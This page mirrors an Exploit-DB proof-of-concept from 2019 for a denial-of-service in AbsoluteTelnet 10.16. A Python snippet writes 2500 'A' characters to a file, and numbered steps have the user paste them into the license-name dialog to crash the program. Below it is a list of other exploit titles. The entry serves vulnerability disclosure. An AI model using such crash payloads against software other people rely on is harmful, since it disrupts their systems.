AbsoluteTelnet 10.16 – ‘License name’ Denial of Service (PoC)

Exploit Database
82 阅读

作者： Victor Mondragón

日期： 2019-05-20
类别：
- dos
平台：
- windows
来源：https://www.exploit-db.com/exploits/46874/

#Exploit Title: AbsoluteTelnet 10.16 - 'License name' Denial of Service (PoC)
#Discovery by: Victor Mondragón
#Discovery Date: 2019-05-19
#Vendor Homepage: https://www.celestialsoftware.net/
#Software Link: https://www.celestialsoftware.net/telnet/AbsoluteTelnet10.16.exe
#Tested Version: 10.16
#Tested on: Windows 7 Service Pack 1 x64

#Steps to produce the crash:
#1.- Run python code: AbsoluteTelent.py
#2.- Open AbsoluteTelent.txt and copy content to clipboard
#3.- Open AbsoluteTelnet.exe
#4.- Select "Help" > "Enter License Key"
#5.- In "License Name" paste Clipboard
#6.- Crashed

cod = "\x41" * 2500

f = open('AbsoluteTelent.txt', 'w')
f.write(cod)
f.close()

last Exploits
AbsoluteTelnet 10.16 – ‘License name’ Denial of Service (PoC)的更多信息

NetShareWatcher 1.5.8.0 – ‘Key’ Denial of Service (PoC)：
Administrador de Contenidos – Admin Authentication Bypass：
DLink DIR 819 A1 – Denial of Service：
Microsoft WINS Service 5.2.3790.4520 – Memory Corruption (MS11-035)：
Rough Auditing Tool for Security (RATS) 2.3 – Array Out of Block Crash：
win32k Clipboard Bitmap – Use-After-Free：
pdfium – CPDF_DIBSource::DownSampleScanline32Bit Heap Out-of-Bounds Read：
Microsoft Windows – Uniscribe Font Processing Heap Out-of-Bounds Write in ‘USP10!UpdateGlyphFlags’ (MS17-011)：